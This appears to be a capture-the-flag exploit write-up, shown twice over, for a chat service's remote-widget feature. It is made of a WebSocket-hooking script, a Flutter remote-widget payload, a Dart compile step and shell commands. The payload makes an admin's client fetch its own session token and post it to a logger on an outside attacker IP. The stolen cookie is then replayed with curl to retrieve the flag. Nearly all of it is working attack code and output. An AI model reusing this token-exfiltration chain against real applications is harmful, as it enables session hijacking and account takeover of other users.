stypr · May 30, 2022 02:41
diff --git a/exploit.js b/exploit.js
 // run before send
 const originalSend = WebSocket.prototype.send;
 window.sockets = [];
 WebSocket.prototype.send = function(...args) {
  if (window.sockets.indexOf(this) === -1)
    window.sockets.push(this);
  return originalSend.call(this, ...args);
 };

 // run after send
 data = {
    "type":"widget",
    "widget":"@158.101.144.10/defcon_exp/exploit.php",
    "author": {
        "user":"1234#f8d4d5ab",
        "platform":"web"
    },
    "recipients":[
        "admin#13371337"
    ],
    "data":{
        "message":"styyyyyyyyyyyyyyyyyy",
        "flag_url": "@158.101.144.10/defcon_exp/logger.php",
        "apiGet": "/api/poll/options?poll=e86188d3-5e28-4b85-b1ba-231504a37495",
        "apiVote": "/api/poll/vote?poll=e86188d3-5e28-4b85-b1ba-231504a37495"
    }
 }

 window.sockets[0].send(JSON.stringify(data));
diff --git a/exploit.rfwtxt b/exploit.rfwtxt
 import core.widgets;
 import core.material;
 import local;

 widget root { loaded: false } = Container(
    child: Column(
        mainAxisAlignment: "center",
        children: [
            switch state.loaded {                     
                true: Column(
                    children: [
                        Text(
                            text: data.new_token
                        ),
                        ApiMapper(
                            url: data.data.apiGet,
                            jsonKey: "options",
                            dataKey: "poll_result",
                            onLoaded: event "api_post" {
                                path: data.data.flag_url,
                                body: {admin_token: data.new_token}
                            }
                        ),
                    ],
                ),
                false: ApiMapper(
                   url: "/api/token",
                   jsonKey: "new_token",
                   dataKey: "new_token",
                   onLoaded: set state.loaded = true
                ),
            },
        ],
    ),
 );
diff --git a/exploit.sh b/exploit.sh
 $ snap install flutter
 $ dart rfw_compile.dart
 $ // upload exploit.rfw, send to admin, get admin_token
 $ cat /tmp/leaked_token
 {"admin_token":["a","d","m","i","n","%","2","3","1","3","3","7","1","3","3","7",".","0","c","g","U","R","K","T","-","O","7","O","p","O","Q","K","a","g","F","q","v","5","h","3","i","W","2","c","5","c","f","9","s","i","D","1","4","u","u","h","3","-","0","U"]
 $ curl "http://discoteq-thl53at4nuzlm.shellweplayaga.me/api/flag" -H "Cookie: token=admin#13371337.0cgURKT-O7OpOQKagFqv5h3iW2c5cf9siD14uuh3-0U" -d '{"ticket":"ticket{...}"}
 {"flag":"flag{AnchorJackline3058n22:ydHlchqaomMyj_wH7Bke3CcIAVY_Y5wwn02c66s4QU17GdcW1NhliZgpHxOd6EZpkvlkJjjm9CF95K37nGfA1g}"}
diff --git a/rfw_compile.dart b/rfw_compile.dart
 // snap install dart
 // dart rfw_compile.dart

 import 'dart:io';

 import 'package:rfw/formats.dart';

 void main() {
  final String pluginZZ = File('exploit.rfwtxt').readAsStringSync();
  File('exploit.rfw').writeAsBytesSync(encodeLibraryBlob(parseLibraryFile(pluginZZ)));
 }
	// run before send
	const originalSend = WebSocket.prototype.send;
	window.sockets = [];
	WebSocket.prototype.send = function(...args) {
	if (window.sockets.indexOf(this) === -1)
	window.sockets.push(this);
	return originalSend.call(this, ...args);
	};

	// run after send
	data = {
	"type":"widget",
	"widget":"@158.101.144.10/defcon_exp/exploit.php",
	"author": {
	"user":"1234#f8d4d5ab",
	"platform":"web"
	},
	"recipients":[
	"admin#13371337"
	],
	"data":{
	"message":"styyyyyyyyyyyyyyyyyy",
	"flag_url": "@158.101.144.10/defcon_exp/logger.php",
	"apiGet": "/api/poll/options?poll=e86188d3-5e28-4b85-b1ba-231504a37495",
	"apiVote": "/api/poll/vote?poll=e86188d3-5e28-4b85-b1ba-231504a37495"
	}
	}

	window.sockets[0].send(JSON.stringify(data));
	import core.widgets;
	import core.material;
	import local;

	widget root { loaded: false } = Container(
	child: Column(
	mainAxisAlignment: "center",
	children: [
	switch state.loaded {
	true: Column(
	children: [
	Text(
	text: data.new_token
	),
	ApiMapper(
	url: data.data.apiGet,
	jsonKey: "options",
	dataKey: "poll_result",
	onLoaded: event "api_post" {
	path: data.data.flag_url,
	body: {admin_token: data.new_token}
	}
	),
	],
	),
	false: ApiMapper(
	url: "/api/token",
	jsonKey: "new_token",
	dataKey: "new_token",
	onLoaded: set state.loaded = true
	),
	},
	],
	),
	);
	$ snap install flutter
	$ dart rfw_compile.dart
	$ // upload exploit.rfw, send to admin, get admin_token
	$ cat /tmp/leaked_token
	{"admin_token":["a","d","m","i","n","%","2","3","1","3","3","7","1","3","3","7",".","0","c","g","U","R","K","T","-","O","7","O","p","O","Q","K","a","g","F","q","v","5","h","3","i","W","2","c","5","c","f","9","s","i","D","1","4","u","u","h","3","-","0","U"]
	$ curl "http://discoteq-thl53at4nuzlm.shellweplayaga.me/api/flag" -H "Cookie: token=admin#13371337.0cgURKT-O7OpOQKagFqv5h3iW2c5cf9siD14uuh3-0U" -d '{"ticket":"ticket{...}"}
	{"flag":"flag{AnchorJackline3058n22:ydHlchqaomMyj_wH7Bke3CcIAVY_Y5wwn02c66s4QU17GdcW1NhliZgpHxOd6EZpkvlkJjjm9CF95K37nGfA1g}"}
	// snap install dart
	// dart rfw_compile.dart

	import 'dart:io';

	import 'package:rfw/formats.dart';

	void main() {
	final String pluginZZ = File('exploit.rfwtxt').readAsStringSync();
	File('exploit.rfw').writeAsBytesSync(encodeLibraryBlob(parseLibraryFile(pluginZZ)));
	}